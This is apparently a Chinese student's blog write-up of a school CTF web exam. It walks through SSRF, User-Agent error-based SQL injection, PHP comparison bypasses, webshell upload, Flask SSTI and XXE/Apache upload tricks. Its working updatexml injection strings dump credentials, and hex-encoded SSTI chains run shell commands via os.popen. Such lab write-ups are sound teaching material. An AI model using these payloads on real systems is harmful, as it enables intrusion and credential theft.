2025年春季学期开学第二次考试复现

WEB

ez_ssrf

打开环境

这里可以看见这里是一个ssrf漏洞的绕过

这里首先先理解一下第一层

我们输入的url里面必须存在http://127.0.0.1这一串

但是第二层又不允许存在127.0.0.1这一串

所以我们需要绕过

这里再解释一个东西::1这是一个ipv6的地址和127.0.0.1是一个东西

这里我们需要再了解一个东西0.0.0.0这里包含着本机所以的ip地址就包括127.0.0.1

所以我们可以使用0.0.0.0来绕过对127.0.0.1的过滤

构造payload

得到flag

ez_sql

打开环境

这里是一个登录界面

当时想着会不会是先弱口令爆破

但是题目说是sql就一直没试,导致题目做不出来

还是题目做少了

这里先进行弱口令爆破

这里找到一个很特殊的

先来试一下

抓包看一下

这里目前也是没有找到什么能够快速判断是UA注入的方法,因为它不会告诉你它把UA也存到数据库里了

所以实战的时候看来只能测试一下

这里打个’看一下

这里可以发现报错了

判断是UA注入,先把前面那一串变成1不然看着难受

先看下注入型

存在报错信息,并且看出来是’)这样

查字段的时候啥都没有

目前回显出来的信息至于报错信息

所以利用报错信息进行报错注入

这里先细细观察一下报错信息

这里报错回显出来了value值

这个一般是在insert插入语句里才会有

所以可以判断这个报错是在insert语句里发送

构造payload检测下报错注入

1' and updatexml(1,0x7e,2))#

对了就是报错注入

然后先看下有没有被过滤的bp直接爆破一下

这里大概看了一下我们用到的应该就是=被过滤了

爆库

1' and updatexml(1,concat(0x7e,database()),2))#

这样能够执行得理解一下sql语句执行的顺序

语法解析,语义分析,优化与执行

这里重点是要理解语法解析的过程

这里就重点说一下这个执行过程

在执行的时候我们构造的payload是一个updatexml的一个报错注入

它的优先级高于语法错误,所以我们的payload会先进行运行再运行insert语句

所以我们只需要通过语法解析时对tokens的检测就可以了

就是'(这些

所以这样也可以运行,但如果不是报错注入我猜测应该就要将value值一一对应完整再运行

爆表

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'YUNXI_DB')),2))#

爆字段

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name like 'uagents')),2))#

爆内容

1' and updatexml(1,concat(0x7e,(select group_concat(username,password) from YUNXI_USER)),2))#

这里没有显示出来使用mid显示一下

1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from YUNXI_USER),20)),2))#

1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from YUNXI_USER),45)),2))#

ez_rce

打开环境

这里就是一个简单的绕过

post请求发送两个参数a,b

get请求发送一个参数num

这里首先是一个num的is_numeric绕过

这里在后面随便跟一个不是数字的字符都可以绕过

重点是弱比较

弱比较的情况下,不会比较类型只比较大小

这里是字符串和纯数字进行比较

所以会优先帮字符串转化为数字,如果是数字开头就会提取到非数字为止,如果是非数字开头就转化为0

所以这里转化为12345

a和b的话是一个md5的强比较直接数组绕过

然后是一个文件包含,那就直接伪协议读取,旁边也有提示

再去base64解码一下

这里不好看拿去vscode里面看

这里就大概解读一下

首先上面红色那一串是m,n里的危险关键字

m,n里不能有

然后下面使用到了一个函数call_user_func()

这是当时的提示

call_user_func 是 PHP 中的一个内置函数,用于动态调用回调函数或类方法。call_user_func(函数,参数1,参数2)

当时注意点错了,我们首先必须要知道它是一个内置函数,所以可以直接调用的命令应该是内置函数

这里说的类方法我们所得到的文件里面也没有所以暂时不考虑

(>__<)

所以我们要关注的应该是一些内置函数当时的system函数用错了一直加()

(>__<)

本来是不用加的

直接\绕过cat*绕过f就可以了

ez_upload

打开环境

直接使用dirsearch扫一下看看

也是不知道什么情况,扫不到师兄说的文件,就按照我当时考试的时候做的方法做

直接上传一个php文件后缀改成phtml再删除前端验证

直接使用命令执行来找flag

先访问这个文件所在位置

看见flag了

直接cat

野原新之助的商店

打开环境

先随便点点

只有那个搜索框有用

讲实话,这个搜索框显示出来这个样子,直接就是ssti的模样,但也有可能是我看过app.py

但这个样式八九不离十就是ssti

看下{{7*7}}

再看下{{7*'7'}}

确定了就是flask框架的ssti注入

这里先用字典爆破一下下,看看被过滤了些什么

好家伙过滤这么多,先用16进制绕过看看

{{''['\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F']['\x5F\x5F\x62\x61\x73\x65\x5F\x5F']}}

那也是直接看可用类

{{''['\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F']['\x5F\x5F\x62\x61\x73\x65\x5F\x5F']'\x5F\x5F\x73\x75\x62\x63\x6C\x61\x73\x73\x65\x73\x5F\x5F'}}

直接去找os类

也是找到了,看下索引

网页上也是直接找不出来它下面还有一段一摸一样的超出极限了

这里写一个及其简陋的脚本来算

ok,直接就是来先看下目录

{{''['\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F']['\x5F\x5F\x62\x61\x73\x65\x5F\x5F']'\x5F\x5F\x73\x75\x62\x63\x6C\x61\x73\x73\x65\x73\x5F\x5F'[132]['\x5F\x5F\x69\x6E\x69\x74\x5F\x5F']['\x5F\x5F\x67\x6C\x6F\x62\x61\x6C\x73\x5F\x5F']'popen''read'}}

也是看见flag了

直接用\绕过cat它

但是会发现是空的

这里要介绍一个变量,也就是我们bp抓包的时候就知道的一个变量

query用在编程语言中的一个变量它会统一进行校验和转义

我们刚刚输入的、就变成了一个转义符

所以需要我们添加一个转义符号,让\变成一个文本样式存在

而不是当作转移符号存在

{{''['\x5F\x5F\x63\x6C\x61\x73\x73\x5F\x5F']['\x5F\x5F\x62\x61\x73\x65\x5F\x5F']'\x5F\x5F\x73\x75\x62\x63\x6C\x61\x73\x73\x65\x73\x5F\x5F'[132]['\x5F\x5F\x69\x6E\x69\x74\x5F\x5F']['\x5F\x5F\x67\x6C\x6F\x62\x61\x6C\x73\x5F\x5F']['popen']('ca\t f1444444g')'read'}}

Secret Platform

打开环境

熟悉的界面

先随便输入看看

说admin不允许,看下网页的源代码

这个应该是xxe漏洞

这里抓个包先看一下

可以发现它是直接当作xml格式上传

这里使用dirsearch扫一下

这里可以看到upload.php被重定向到admin.php

所以是因为我们没有登录,不能进行文件上传

访问一下这个东西

这里使用弱口令爆破没啥用

直接使用php伪协议直接来读取这个文件的源码

拿去vscode看看

看见密码了

到达这里直接上传一个🐎看看

不行

直接去访问upload.php的源码

在里面是可以找到文件上传位置的

这里要使用到apache的一个漏洞,apache版本Apache 2.0.x <= 2.0.59,Apache 2.2.x <= 2.2.17才会存在的漏洞

.php.a只要我们在最后面加一个识别不了的文件后缀

它会自己向前识别

直接发送一个绕过文件头的php文件

直接传参找flag

直接cat

这里不能使用.htaccess文件,上传之后最终的文件名会变成file_.htaccess

这就不是apache的配置文件了,无法使用

posted @ 2025-05-08 22:46  crook666  阅读(51)  评论(0)    收藏  举报